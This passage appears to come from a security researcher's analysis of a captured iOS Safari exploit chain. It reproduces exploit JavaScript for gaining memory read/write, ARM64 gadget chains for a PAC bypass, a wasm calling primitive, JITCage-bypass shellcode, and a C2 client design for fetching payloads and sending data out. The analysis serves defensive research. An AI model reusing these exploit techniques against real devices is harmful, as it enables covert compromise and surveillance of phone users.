    };
    recursive_func(0, arr_to_find);
    if (marker_array[5] !== 6.6) {
        debug_log("");
        try {
            debug_log("");
            rw.ws = rw.numConv.f64_to_bigint(marker_array[0]);
            rw.ds = rw.numConv.f64_to_bigint(marker_array[1]);
            rw.ys = rw.numConv.f64_to_bigint(marker_array[2]);
            rw.As = rw.numConv.f64_to_bigint(marker_array[3]);
            rw.arr_obj_num_num_prop_addr = rw.numConv.f64_to_bigint(marker_array[4]);
            fingerprint_module.device_properties.rw = rw; // Xn
            t()
        } catch (t) {
            debug_log(t)
        }
    } else window.setTimeout(take_primitives, 0)
};

The code will now in a loop push the recursive function with its arguments on to the stack until marker_array[5] magically changes. Meanwhile the worker goes from the wasm instance to its cpp backend object and from there to the vm object. The vm object then conveniently stores a pointer to the stack (m_softStackLimit) from where the worker can use R/W to try to find the marker the main thread is pushing:

for (let offset = -0x1800n; offset > -0x3000n; offset -= 0x8n) {
    const addr2check = stack_base - offset;
    // check if we have the marker
    if (_rw.read64(addr2check) == 0xfffe000000055432n &&
        _rw.read64(addr2check + 0x8n * 2n) == 0xfffe000000055432n &&
        _rw.read64(addr2check + 0x8n * 3n) == 0xfffe0000000ff432n && 
        _rw.read64(addr2check + 0x8n * 5n) == 0xfffe0000000ff432n) {

and once it finds the array named arr_to_find above it can read com_arr_towards_worker and marker_array from there and then write to their butterflies and corrupt the two wasm instances of the main thread to gain R/W there:

const com_arr_towards_worker = _rw.read64(addr2check + 0x8n * 1n);
const com_arr_towards_worker_butterfly = _rw.read64(com_arr_towards_worker + 0x8n);
const marker_array = _rw.read64(addr2check + 0x8n * 4n);
const marker_array_butterfly = _rw.read64(marker_array + 0x8n);
const wasm_i1 = _rw.read64(com_arr_towards_worker_butterfly);
const wasm_i1_cpp = _rw.read64(wasm_i1 + toBigInt(offsets[webasm_js_to_cpp_instance]));
const wasm_i1_cpp_globals = wasm_i1_cpp + toBigInt(offsets[webasm_cpp_instance_global_0_off]);
const wasm_i2 = _rw.read64(com_arr_towards_worker_butterfly + 0x8n);
const wasm_i2_cpp = _rw.read64(wasm_i2 + toBigInt(offsets[webasm_js_to_cpp_instance]));
const wasm_i2_cpp_globals = wasm_i2_cpp + toBigInt(offsets[webasm_cpp_instance_global_0_off]);

_rw.w64_wrapper(wasm_i2_cpp + toBigInt(offsets[wasm_cpp_gc_mark]), 0x8000000000000000n);
_rw.w64_wrapper(wasm_i1_cpp + toBigInt(offsets[wasm_cpp_gc_mark]), 0x8000000000000000n);
_rw.w64_wrapper(wasm_i1_cpp_globals, wasm_i2_cpp_globals);
_rw.w64_wrapper(marker_array_butterfly + 0x0n, wasm_i2_cpp);
_rw.w64_wrapper(marker_array_butterfly + 0x8n, wasm_i2_cpp_globals);
_rw.w64_wrapper(marker_array_butterfly + 0x10n, wasm_i1_cpp);
_rw.w64_wrapper(marker_array_butterfly + 0x18n, wasm_i1_cpp_globals);
_rw.w64_wrapper(marker_array_butterfly + 0x20n, com_arr_towards_worker);
_rw.w64_wrapper(marker_array_butterfly + 0x28n, 0x0n);

And with this they finally have R/W on the main thread, what a ride!

Their next high-level goal is to execute native code inside of the WebContent process to run their LPE, but before they can load and link a dylib they first need to get a function calling primitive and for this on newer devices a PAC bypass is required, so let's have a look at how they achieve this next.

3.3. WebKit code-exec

In this section we will have a look at the PAC bypass (seedbell_17) which abused the fact that certain dylibs had writable const sections to overwrite an unsigned GOT entry and then trigger a signing operation on it, and how they escalate it to an 8-argument function calling primitive via wasm.

3.3.1. PAC bypass

Once the exploit gained R/W, code execution returns to the main module. This will now do PAC detection by getting a function pointer from both a WebAssembly.Table and a WebAssembly.Instance object and checking if they share the same upper bits. If they don't the exploit assumes that PAC is enabled (this makes sense because addresses within JSC should always share the same upper bits, but the PAC bits on each of these pointers would be different). Afterwards they align this pointer to a page boundary and then scan backwards for the MachO header (id'd via 0xFEEDFACF) of the JSC binary. Once that is found they can read the CPU type to determine if the device is x86, arm64 or arm64e. This is the final time they update the device-specific offsets based on the CPU type, afterwards they freeze the object.

In this capture, PAC is detected, which means they now need to acquire a signer.

This is done by selecting a PAC bypass (for this capture against iOS 17.1, that is seedbell_17) and then executing it which will export a signer class back to the main module, allowing it to sign pointers with any key and modifier.

For seedbell_17 besides the main PAC bypass module (29b874a9a6cc9fa9d487b31144e130827bf941bb) they will also load a helper module (477db22c8e27d5a7bd72ca8e4bc502bdca6d0aba) which consists of 6 classes:

a wrapper around the dyld shared cache, parsing all the MachOs within it and then exporting a function to get a MachO based on path
a MachO wrapper, exporting the ability to get MachO sections or symbols
a helper class to handle/parse dyld export chains
a helper to deal with memory buffers allow you to skip/seek and read from a buffer, similar to io.BytesIO in python
a helper to deal with arm64 assembly finding xrefs, code sequences and decode jumps for example
a class that uses the other classes to find certain gadgets needed for the PAC bypass

Because the original seedbell doesn't load this helper I assume this was added as an afterthought once they realised that the seedbell gadgets likely keep changing and they wanted easier support for parsing the dyld shared cache in order to find gadgets.

The main PAC bypass module then has 11 classes, they can roughly be divided into

the signer class and a wrapper around it dealing with JS numbers - this basically supports signing with any key and context and is also the class which is exported to the rest of the chain
classes providing several types of calling primitives with different restrictions on arguments
a generic caller, which can be named as WasmJitCageCallPrimitive because they left an exception string in the final exploit
helper classes for managing memory (free, malloc etc)

I think it makes sense to explain the PAC bypass module in order of primitives acquired, so let's start with the caller:

For this they create an Intl.Segmenter object, get it into a state where it's ready to segment text and then modify its internal state.

Specifically they:

create a fake array of matches in the fForwardTable of the RBBIDataWrapper to guarantee a call to access the text
overwrite the access function with the PACIZA pointer they want to call
overwrite fText_chunkNativeLimit for the value of x1 they want to call the PACIZA pointer with
perform segment_iter.next().value; to trigger the call
restore both the table and the PACIZA function pointer array object

For this they need a couple of memory buffers and at this stage they get them by creating an array buffer and then operating on its backend storage.

At this point they have a PACIZA calling primitive with x1 fully controlled. Based on this they gain two more primitives, which gives an arbitrary x0, x1 and x2 calling primitive and another to call arbitrary PACIZA pointers with arbitrary x0, x1, x2 and x3, but where x0 and x1 are the same value. In both of these new primitives they also get the return value of the call by storing it to memory and reading it back after the call.

3.3.1.1. Call chains for early PACIZA primitives

(click to expand)

For the former the following call chain is used:

_autohinter_iterator_end:
c10000b4  cbz x1, 0x18
221040f9  ldr x2, [x1, 0x20] - enet_allocate_packet_payload_default
820000b4  cbz x2, 0x18
200440f9  ldr x0, [x1, 8] - buf5_80
211840f9  ldr x1, [x1, 0x30] - buf4_768
5f081fd6  braaz x2
c0035fd6  ret

enet_allocate_packet_payload_default:
7f2303d5  pacibsp
f44fbea9  stp x20, x19, [sp, -0x20]!
fd7b01a9  stp x29, x30, [sp, 0x10]
fd430091  add x29, sp, 0x10
f30300aa  mov x19, x0
48100fb0  adrp x8, 0x1e209000
086d41f9  ldr x8, [x8, 0x2d8]
e00301aa  mov x0, x1 - buf4_768
1f093fd6  blraaz x8 - _HTTPConnectionFinalize
f40300aa  mov x20, x0
800000b5  cbnz x0, 0x38
48100fb0  adrp x8, 0x1e209000
087541f9  ldr x8, [x8, 0x2e8]
1f093fd6  blraaz x8 - xmlSAX2GetPublicId_ref
740a00f9  str x20, [x19, 0x10] - stores to buf5_80+0x10
fd7b41a9  ldp x29, x30, [sp, 0x10]
f44fc2a8  ldp x20, x19, [sp], 0x20
ff0f5fd6  retab

_HTTPConnectionFinalize: // there are some CFRelease calls etc in there as well that are skipped because the ptrs are null (omitted for readability)
PACIBSP
STP             X20, X19, [SP,#-0x10+var_10]!
STP             X29, X30, [SP,#0x10+var_s0]
ADD             X29, SP, #0x10
MOV             X19, X0
LDR             X8, [X0,#0x40]
CBZ             X8, loc_192E60A8C
LDR             X1, [X19,#0x28]
MOV             X0, X19
BLRAAZ          X8

LDR             X0, [X19,#0x138] ; cf
CBNZ            X0, loc_192E60AD0
LDR             X8, [X19,#0x158]
CBZ             X8, loc_192E60AF4
LDR             X0, [X19,#0x148]
BLRAAZ          X8  

                        ; CODE XREF: __HTTPConnectionFinalize+84↑j
LDR             X8, [X19,#0x178] - _autohinter_iterator_begin_paciza
LDR             W0, [X19,#0x88] ; int 
CBZ             X8, loc_192E60B20
LDP             X1, X2, [X19,#0x180] - x1/buf1_80
LDR             X3, [X19,#0x190] - 0x1CCCCCCC
BLRAAZ          X8

                        ; CODE XREF: __HTTPConnectionFinalize+C4↓j
                        ; __HTTPConnectionFinalize+D0↓j ...
MOV             W8, #0xFFFFFFFF
STR             W8, [X19,#0x88]

                        ; CODE XREF: __HTTPConnectionFinalize:loc_192E60B20↓j
LDP             X29, X30, [SP,#0x10+var_s0]
LDP             X20, X19, [SP+0x10+var_10],#0x20
RETAB

_autohinter_iterator_begin:
c20000b4  cbz x2, 0x18
430840f9  ldr x3, [x2, 0x10] - dict.ab 
830000b4  cbz x3, 0x18
400440f9  ldr x0, [x2, 8] - dict.sb
421840f9  ldr x2, [x2, 0x30] - dict.x2
7f081fd6  braaz x3
c0035fd6  ret

And for the latter they invoke the following call chain:

_autohinter_iterator_end:
c10000b4  cbz x1, 0x18
221040f9  ldr x2, [x1, 0x20] - _HTTPConnectionFinalize_paciza
820000b4  cbz x2, 0x18
200440f9  ldr x0, [x1, 8] - buf2_544
211840f9  ldr x1, [x1, 0x30] - 0
5f081fd6  braaz x2
c0035fd6  ret

_HTTPConnectionFinalize: // there are some CFRelease calls etc in there as well that are skipped because the ptrs are null (omitted for readability)
PACIBSP
STP             X20, X19, [SP,#-0x10+var_10]!
STP             X29, X30, [SP,#0x10+var_s0]
ADD             X29, SP, #0x10
MOV             X19, X0
LDR             X8, [X0,#0x40]
CBZ             X8, loc_192E60A8C
LDR             X1, [X19,#0x28]
MOV             X0, X19
BLRAAZ          X8

LDR             X0, [X19,#0x138] ; cf
CBNZ            X0, loc_192E60AD0
LDR             X8, [X19,#0x158]
CBZ             X8, loc_192E60AF4
LDR             X0, [X19,#0x148]
BLRAAZ          X8  

                        ; CODE XREF: __HTTPConnectionFinalize+84↑j
LDR             X8, [X19,#0x178] - _EdgeInfoCFArrayReleaseCallBack_paciza
LDR             W0, [X19,#0x88] ; int 
CBZ             X8, loc_192E60B20
LDP             X1, X2, [X19,#0x180] - early_malloc_buffer/x2
LDR             X3, [X19,#0x190] - x3 (ib)
BLRAAZ          X8

                        ; CODE XREF: __HTTPConnectionFinalize+C4↓j
                        ; __HTTPConnectionFinalize+D0↓j ...
MOV             W8, #0xFFFFFFFF
STR             W8, [X19,#0x88]

                        ; CODE XREF: __HTTPConnectionFinalize:loc_192E60B20↓j
LDP             X29, X30, [SP,#0x10+var_s0]
LDP             X20, X19, [SP+0x10+var_10],#0x20
RETAB

_EdgeInfoCFArrayReleaseCallBack:
7f2303d5  pacibsp
f44fbea9  stp x20, x19, [sp, -0x20]!
fd7b01a9  stp x29, x30, [sp, 0x10]
fd430091  add x29, sp, 0x10
f30301aa  mov x19, x1
f40300aa  mov x20, x0
290440f9  ldr x9, [x1, 8] - buf4_80
280940f9  ldr x8, [x9, 0x10] - enet_allocate_packet_payload_default_paciza
880000b4  cbz x8, 0x30
200140f9  ldr x0, [x9] - buf3_80
610240f9  ldr x1, [x19] - sb
1f093fd6  blraaz x8
e00314aa  mov x0, x20 
e10313aa  mov x1, x19 
fd7b41a9  ldp x29, x30, [sp, 0x10]
f44fc2a8  ldp x20, x19, [sp], 0x20
ff2303d5  autibsp
d0071eca  eor x16, x30, x30, lsl 1
5000f0b6  tbz x16, 0x3e, 0x50
208e38d4  brk 0xc471
08590514  b 0x156470

enet_allocate_packet_payload_default:
7f2303d5  pacibsp
f44fbea9  stp x20, x19, [sp, -0x20]!
fd7b01a9  stp x29, x30, [sp, 0x10]
fd430091  add x29, sp, 0x10
f30300aa  mov x19, x0
48100fb0  adrp x8, 0x1e209000
086d41f9  ldr x8, [x8, 0x2d8] - dict.ab
e00301aa  mov x0, x1
1f093fd6  blraaz x8
f40300aa  mov x20, x0
800000b5  cbnz x0, 0x38
48100fb0  adrp x8, 0x1e209000
087541f9  ldr x8, [x8, 0x2e8]
1f093fd6  blraaz x8 - xmlSAX2GetPublicId_ref
740a00f9  str x20, [x19, 0x10] - stores to buf3_80 + 0x10
fd7b41a9  ldp x29, x30, [sp, 0x10]
f44fc2a8  ldp x20, x19, [sp], 0x20
ff0f5fd6  retab

xmlSAX2GetPublicId_ref:
mov x0, 0
ret

Oddly, this is needlessly complex; I don't see a reason why they couldn't have removed some of the gadgets. All of the PACIZA pointers come from regions in the dyld shared cache where they are stored signed and can be read out. By overly using these gadgets they burn more of these pointers when caught, which is why I would've assumed there is a strong incentive to reduce the number of gadgets used.

With these two primitives they are ready to perform the PAC bypass and have also gained the ability to call malloc (by using a PACIZA pointer to _xmlMalloc).

For the PAC bypass they create an [NSUUID UUID] object using the calling primitive and then call cksqlcs_blobBindingValue:destructor:error: on it. They don't have any control over error:, but it doesn't seem to matter.

This will land in [CKSQLiteCompiledStatementBindingValues cksqlcs_blobBindingValue:destructor:error:] (implemented in CloudKit) which looks like this:

PACIBSP
STP             X24, X23, [SP,#-0x10+var_30]!
STP             X22, X21, [SP,#0x30+var_20]
STP             X20, X19, [SP,#0x30+var_10]
STP             X29, X30, [SP,#0x30+var_s0]
ADD             X29, SP, #0x30
MOV             X19, X3
MOV             X20, X2
MOV             X21, X0
MOV             W23, #0x10
MOV             W0, #0x10
MOV             W1, #0x69EEEF37
BL              _malloc_type_malloc_8
MOV             X22, X0
MOV             X0, X21
MOV             X2, X22
BL              _objc_msgSend$getUUIDBytes_
STR             X23, [X20]
ADRP            X16, #_free_ptr@PAGE
LDR             X16, [X16,#_free_ptr@PAGEOFF]
PACIZA          X16
STR             X16, [X19]
MOV             X0, X22
LDP             X29, X30, [SP,#0x30+var_s0]
LDP             X20, X19, [SP,#0x30+var_10]
LDP             X22, X21, [SP,#0x30+var_20]
LDP             X24, X23, [SP+0x30+var_30],#0x40
RETAB

As you can see they malloc a 0x10 byte object, store the bytes of the UUID in it and then load the pointer to _free_ptr from the GOT, PACIZA sign it and then store it in the destructor pointer passed in as an argument. This on its own is not a security bug but only a security weakness, basically _free_ptr is likely defined as void* in source and because of this the compiler can't PAC sign it because it's not a function pointer, but then when it gets assigned to the destructor it is casted to a function pointer and the compiler has to sign it there.

3.3.1.2. Reproducing the weak code pattern

(click to expand)

The pattern can be reproduced with the following code:

typedef size_t (*fn_t)(const char *s);
fn_t f(void)
{
    return strlen;
}

Which will generate the following assembly for f:

adrp x16, reloc.strlen
ldr x16, [x16]
paciza x16 
mov x0, x16 
ret

On its own this isn't a security bug because the pointer is inside the GOT, which is part of the __DATA_CONST segment and thereby read-only, but the problem is that in addition there was a linker weakness as well which under certain circumstances would prevent the linker from protecting the __DATA_CONST segment as read-only. Specifically dyld had code in segmentSupportsDataConst and assignDataSegmentAddresses which would not protect __DATA_CONST as read-only if the binary had:

Swift code and a __objc_const section, because Swift has some mutable data inside of __objc_const which it would need to modify during execution
pointer based objc method lists, as they would store their function pointers inside of the const section and a call to setIMP to change them would then crash
resolver functions
libcrypto.0.9.8.dylib, which writes to __DATA_CONST for some reason

I think the most pressing out of them was Swift, which is also why I speculate that it took Apple till iOS 18 beta 1 to address this issue. Since then the linker will always protect __DATA_CONST as read-only and there has been the introduction of __LATE_CONST and __TPRO_CONST to deal with the edge cases.

I assume that both seedbell and seedbell_16.6 are very similar and that they got closed accidentally either by the dylib they were in no longer falling into one of the four categories above or by the flow that signs the pointer no longer being reachable.

With this they can then sign _xmlHashScanFull which gives them a full x0-x5 calling primitive with the exception that x0 can't be non-null.

This signing functionality is then exported back to the main module.

Finally they have a class that supports calling with up to 8 arguments.

For this they use a wasm module that defines 3 functions. They take in 16 32-bit arguments in function f, then pack them into 8 64-bit values and finally call o, but using R/W the exploit replaced the function pointer to o's JIT trampoline with a function pointer to the target function, giving them a nice 8-argument calling primitive. To correctly sign the target function pointer, they PACIZA sign _jitCagePtr and then use it to sign the target function. Afterwards wasm will store the 64-bit return value as two i32s into memory from where it can be retrieved from JavaScript. The reason not more than 8 arguments are supported is that afterwards, based on Apple's calling convention, the remaining arguments are pushed onto the stack and I assume the wasm calling convention is different.

3.3.1.3. Wasm module for 8-argument calling primitive

(click to expand)

(module
  (type (;0;) (func (param i64 i64 i64 i64 i64 i64 i64 i64) (result i64)))
  (type (;1;) (func (param i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32) (result i64)))
  (type (;2;) (func (param i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32)))
  (func (;0;) (type 0) (param i64 i64 i64 i64 i64 i64 i64 i64) (result i64)
    i64.const 0)
  (func (;1;) (type 1) (param i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32) (result i64)
    local.get 1
    i64.extend_i32_u
    i64.const 32
    i64.shl
    local.get 0
    i64.extend_i32_u
    i64.or
    local.get 3
    i64.extend_i32_u
    i64.const 32
    i64.shl
    local.get 2
    i64.extend_i32_u
    i64.or
    local.get 5
    i64.extend_i32_u
    i64.const 32
    i64.shl
    local.get 4
    i64.extend_i32_u
    i64.or
    local.get 7
    i64.extend_i32_u
    i64.const 32
    i64.shl
    local.get 6
    i64.extend_i32_u
    i64.or
    local.get 9
    i64.extend_i32_u
    i64.const 32
    i64.shl
    local.get 8
    i64.extend_i32_u
    i64.or
    local.get 11
    i64.extend_i32_u
    i64.const 32
    i64.shl
    local.get 10
    i64.extend_i32_u
    i64.or
    local.get 13
    i64.extend_i32_u
    i64.const 32
    i64.shl
    local.get 12
    i64.extend_i32_u
    i64.or
    local.get 15
    i64.extend_i32_u
    i64.const 32
    i64.shl
    local.get 14
    i64.extend_i32_u
    i64.or
    i32.const 0
    call_indirect (type 0)
    return)
  (func (;2;) (type 1) (param i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32) (result i64)
    local.get 0
    local.get 1
    local.get 2
    local.get 3
    local.get 4
    local.get 5
    local.get 6
    local.get 7
    local.get 8
    local.get 9
    local.get 10
    local.get 11
    local.get 12
    local.get 13
    local.get 14
    local.get 15
    call 1
    return)
  (func (;3;) (type 2) (param i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32)
    (local i64)
    local.get 0
    local.get 1
    local.get 2
    local.get 3
    local.get 4
    local.get 5
    local.get 6
    local.get 7
    local.get 8
    local.get 9
    local.get 10
    local.get 11
    local.get 12
    local.get 13
    local.get 14
    local.get 15
    call 2
    local.set 16
    i32.const 0
    local.get 16
    i32.wrap_i64
    i32.store
    i32.const 4
    local.get 16
    i64.const 32
    i64.shr_u
    i32.wrap_i64
    i32.store
    return)
  (table (;0;) 2 funcref)
  (memory (;0;) 1 1)
  (export "t" (table 0))
  (export "m" (memory 0))
  (export "o" (func 0))
  (export "f" (func 3))
  (elem (;0;) (i32.const 0) func 0))

The name of this class leaked in an error message (new Error(("WasmJitCageCallPrimitive only supports 8 register args, got ") + (args.length))). I suspect the reason is that the string was assembled in the error message instead of being a raw string, which meant it wasn't replaced when they stripped all strings.

3.3.2. Back in the main module

After the signer and caller have been exported to the main module, they then call a function to validate signing. This basically validates that signing a PAC-stripped wasm function pointer is returning the same result as the original one.

3.4. The JS MachO loading module

Once the exploit achieved a PAC signing and function calling primitive, the main module will load a MachO JIT loading module that is responsible for fetching the LPE stage. There are two different potential loaders, but for this capture c03c6f666a04dd77cfe56cda4da77a131cbb8f1c is selected, which will load and jump to the PE stage. It will load a helper module (b5135768e043d1b362977b8ba9bff678b9946bcb) which in turn loads yet another one (ba712ef6c1bf20758e69ab945d2cdfd51e53dcd8). Both of which are loaded via base64 inside of the parent payload. The latter is yet another dyld shared cache and MachO parser while the former is responsible for loading a MachO binary into the JIT region and making it runnable. The outer layer acts as the orchestrator. We will have a look at them one by one in this section.

3.4.1. MachO parser (no. 2)

Similar to the seedbell generic helper module, this module features a class for the dyld shared cache and a MachO class, which the former uses to load all of the dylibs in the cache into it, as well as helper classes that are used for handling the MachO and its symbols.

Oddly, while having similarities to the seedbell helper, it looks like a complete reimplementation (or rather seedbell's helper is one, because it was shipped later) using its own number helper class as well as using a function to parse a MachO instead of having that embedded into the MachO class. I really don't understand the design decision behind this and thereby assume that it happened because the codebase has evolved and eventually the PAC bypass required a dyld shared cache parser of its own.

3.4.2. The JIT loader module

As the first step the orchestrator will call a function in this module that recreates the WasmJitCageCallPrimitive described in the chapter above, which gives an 8-argument calling primitive. The code seems to be copy-pasted as even the wasm code matches 1:1, but in this case the error message was correctly stripped. I again don't know why this was exported twice, but assume that in the past the exploit chain didn't need an 8-argument calling primitive this early so they didn't export it with the PAC bypass but only with the PE loader and then later also added it to the PAC bypass because it was already needed there.

Afterwards the orchestrator will create the JIT loader class. During construction this class will select a viable loading strategy based on the available code in JSC. It will check if:

WTF::MetaAllocator::allocate(unsigned long, void*) or alternatively WTF::MetaAllocator::allocate(WTF::Locker<WTF::Lock> const&, unsigned long) is available
then look for JSC::LinkBuffer::linkCode(JSC::MacroAssembler&, void*, JSC::JITCompilationEffort) or JSC::LinkBuffer::linkCode(JSC::MacroAssembler&, JSC::JITCompilationEffort)
and finally for JSC::ExecutableMemoryHandle::createImpl(unsigned long)

If it doesn't find JSC::ExecutableMemoryHandle::createImpl(unsigned long), it will generate random JS code (basically some math operations that aren't foldable) and JIT it, then read a pointer chain to get the function's pointer in the JIT region. Based on the available functions they then prepare assembly to handle the loading code. This is either done using pacda or pacdb instructions or a mix of xor and pacdzb/pacdb. They have the same code also as a JS implementation because initially they need to load this shellcode via JS and then use it to "hash" larger sections of code as a speed-up.

Then the C2C JS client is created. They will basically launch a new thread from inside the MachO later and then return to JS code execution. This way they can then maintain a communication channel to JS via a backend buffer allowing them to do networking via JS (for example to fetch new payloads or send off data back to the server). The C2C client has eight states:

initial (0): C2C is idling in its run loop awaiting commands
download requested (1): native code requested a download and changed state to here
downloading/sending (2): C2C picked up the request and is now downloading the data (or sending in case of 7)
downloaded (3): C2C downloaded the data and copied it to the buffer
error (4): C2C encountered an error - in this case it also sends a GET request with the error parameter to the server
exiting (5): this is set by native code again and will exit out of the run loop
update DOM (6): C2C will insert a random div and update the url, then after 10s remove it again. I assume to keep the page "active"
send data (7): send data to the server

The framework again validates that it isn't running on macOS, presumably because the LPE exploitation only supports iOS.

They then instantiate a new class that is responsible for loading the MachO stage. This will initially link the shellcode with default values and decompress a base64 encoded MachO. It will also write the resource url, a ChaCha20 key, the logging url (which is empty for this deployment) and the user agent into different buffers, so that the MachO can access them. Filling everything with default values allows them to do an accurate calculation of the size needed for the code cave. Based on the available methods the JIT loading module will either just create the cave via ExecutableMemoryHandle::createImpl or MetaAllocator::allocate or if neither of those are available use LinkBuffer::linkCode together with the code hashing routines to create the cave. It will then call the MachO loading class to link the code to the created address. This will concatenate the decompressed MachO, shellcode to load it, the ChaCha20 key, the resource url, the document url, the navigator user agent and the logging url (which is empty for this deployment). The shellcode itself also contains a structure in the beginning referencing all of these buffers:

struct config
{
  uint64_t load_2_addr;
  uint64_t macho_load_addr;
  uint64_t is_zero;
  uint64_t code_addr;
  uint64_t macho_23_len;
  uint64_t resource_url_addr;
  uint64_t ChaCha20_key_addr;
  uint64_t document_url_addr;
  uint64_t data_to_load_addr;
  uint64_t useragent_addr;
  uint64_t logging_url_addr;
  uint64_t signed_pacia1716_gadget;
  uint64_t signed_pacib1716_gadget;
  uint64_t signed_pacda_gadget;
  uint64_t signed_pacdb_gadget;
  uint64_t signed_braa_x10_gadget;
  uint64_t mov_x2_x11_braa_x14_gadget_paciza;
  uint64_t jit_op_mov_x13_4911_brab_x2_x13;
  uint64_t braa_x14_pac_ctx;
  uint64_t dlsym_addr;
  uint64_t unk;
  uint64_t in_private_browsing_mode;
  uint64_t should_do_logging;
};

So with this the shellcode also has access to multiple signing and branch gadgets.

Finally, it uses the JIT loading module to load this code via a call to LinkBuffer::linkCode, hashing it with the shellcode routines, then retrieves the entry point from the MachO loading class, starts the C2C routine, and jumps to it.

3.4.3. The loader shellcode

The purpose of the shellcode is to load the MachO into memory and then optionally jump to it. It's quite large because it has to feature a full MachO parser & loader and code patterns to defeat the JITCage. This is also what I'll be mainly focusing on in this section, so if you aren't interested in JITCage bypasses you can skip to the next one.

Public documentation on the JITCage is limited; I was only able to find this presentation by Synacktiv and a talk by Luca on it. The JITCage was introduced as a hardware feature on A15. Generally, Apple's high-level idea seems to be that they want to control what an attacker can execute in JIT code. Regular JIT code doesn't need to perform any syscalls, for example, so they will fault on SVC instructions inside of the JIT region. Similar to this they will also disallow access to system registers via MRS and MSR instructions. Finally they also want to prevent an attacker from gaining arbitrary control flow from JIT code so they disallow any PAC signing instructions and any control flow instructions that aren't PAC authenticated to branch outside of the JIT region. Because the PAC keys for IA and IB signatures are different inside of the JIT region, JSC can lock itself out of generating possible "exit" paths from the JIT region and it does exactly that. During startup it will generate all the signatures for the functions JIT code has to call into, and then it sets a bit to lock itself out from signing any new ones. Because of this, an attacker can't generate new gadgets that their JIT code can call into.

To me it looks like the shellcode was compiled with a custom compiler to be compatible with running inside of this environment, while also staying compatible with running on older CPUs that don't support PAC and CPUs without the JITCage. In order to maintain compatibility with older CPUs the shellcode abuses the fact that the XPACLRI instruction is encoded into nop space on older CPUs, so it can be used as a distinguisher to detect if the CPU supports the arm8.3 PAC extension or not:

MOV             X30, #0xAAAAAAAAAAAAAAAA
XPACLRI
MOV             X0, #0xAAAAAAAAAAAAAAAA
CMP             X0, X30
CSET            X0, NE

If the CPU supports PAC XPACLRI will clear the PAC bits in X30 but on devices without PAC it is executed as a NOP and thereby X30 will still be 0xAAAAAAAAAAAAAAAA. In order to not execute RET instructions the following code is used:

MOV             X10, X30
MOV             X30, #0xAAAAAAAAAAAAAAAA
XPACLRI
MOV             X11, #0xAAAAAAAAAAAAAAAA
CMP             X11, X30
MOV             X30, X10
B.NE            +0x8
RET
MOV             X10, X30
BLR             X10

So on non-PAC devices the code will just execute a RET while on PAC devices it will execute a BLR to return to the caller. In addition to this they have a helper dispatch function for external calls. This will get a function pointer to call in x10 then check if JITCage is enabled (jit_op_mov_x13_4911_brab_x2_x13 is populated in the config) if not it will strip the PAC bits and just jump there:

MOV             X11, X30
MOV             X30, X10
XPACLRI
MOV             X10, X30
MOV             X30, X11
BR              X10

Otherwise it has to go via an indirection. Remember that there is no way for an attacker to generate new JIT exit points because the keys to sign a valid function pointer have been locked away, so they need to use an existing one and get a call primitive from there. For this they use the JIT operation function vmEntryHostFunction which is a very simple one:

global _vmEntryHostFunction
_vmEntryHostFunction:
    jmp a2, HostFunctionPtrTag

translating to the following asm:

_vmEntryHostFunction
MOV             X13, #0x4911
BRAB            X2, X13

So this is a function they can jump to from JIT code and by setting X2 to a valid function pointer that was signed with the HostFunctionPtrTag/0x4911 as context they can then jump further to that one. So the flow in the dispatch is the following: push all arguments to the stack to retain them, jump to vmEntryHostFunction with a setup to then jump to a pacia signing gadget which will then sign the real target function pointer. The function pointer to the pacia gadget is stored correctly signed in the config as signed_pacia1716_gadget. After the call the arguments are restored and the real function pointer is invoked via vmEntryHostFunction.

From a high-level perspective, the shellcode will then execute the following:

brute-force mach_task_self by calling task_info with different possible ports till a call succeeds
set up a big context structure with function pointers to various helpers like linker functions (dlsym, dlopen, etc.) and other system functions (like sys_dcache_flush)
detect CPU features using the COM page
load the MachO and register it to the objc runtime
flush data and instruction cache
get the symbol _process from the MachO
prepare it for execution
jump to it

3.4.3.1. Patchfinding objc symbols

(click to expand)

The shellcode uses two interesting strategies to find the addresses of map_images which is not an exported function. For the first one they will use an exported function as a needle (in this case _objc_flush_caches) and then use dladdr calls till dli_saddr changes to detect function boundaries and from there walk n functions till they find the correct one. For the second one they basically know that in the objc data section _objc_patch_root_of_class is beside map_images so they will dlsym it and then walk over the whole data section till they find a pointer to it from which they can then relatively read out the address of map_images.

3.4.4. The embedded MachO

The embedded MachO will now set up intercom functions for communication with the C2C JS client, implement functions for parsing the configuration files from the C2C server and acting upon them, detect CPU features and iOS version (this will also detect "unsafe" environments like Corellium), and detect a relaxed sandbox as well as code execution inside iTunes Store (instead of Safari). The main function will then do another environment check for Corellium, a valid CPU and hw.l2cachesize, no kern.bootargs and no HOST_CAN_HAS_DEBUGGER configuration. Then a new thread is spawned that will register itself as a UIBackgroundTask so that it can run alongside JS allowing for easy network communication. The background task will optionally send logging to the C2C server.

When the thread starts, it downloads a configuration file from the server. For this capture, that was 7a7d99099b035b2c6512b6ebeeea6df1ede70fbb.js. The file is encrypted with ChaCha20 and compressed using LZMA. Decompression is only done when the header is 0xBEDF00D. Afterwards the config is parsed. I also wrote my own parser, so we can have a look inside:

python3 parse_config.py ../processed_files/28_7a7d99099b035b2c6512b6ebeeea6df1ede70fbb_decompressed
elem: 0x70000 0x3 @ +0x18 (0x878)
0xf2300000 6c682a65deb7cf020dd640d130a2a73e9442ccddc441520c951620a4142605ad b'4800048658463f971e752ff93c1767e9ae7f3431.min.js'
0xf3300000 230ddaa380a7899e52be22cc926a4b7609303e14c3ed55d59049d3b20ee12974 b'b442ab113b829ff8c7bf34afa4d2d997889f308f.min.js'
0xf2400000 176f3b0d80c6c94f5bcc3e638185d1a4a057a859141b569f877468cc7bd7c149 b'5258f6e3eef3eda249179aa1122b50b03cbeea18.min.js'
0xf3400000 e6542d26109c5c3aa4f33c9ee07d69dc58ef66e81a7c20c2447cff7fe9f45a0c b'a78a94196b5d2c95865f6a8423a6b8eb86d07c6c.min.js'
0xf2700000 50a323f335f2bf4634b8f13526dc46f73d6ae15d4960d1f72e601aa4e733a7ec b'38af3c8ba461079a0edc83585023f76843066dcf.min.js'
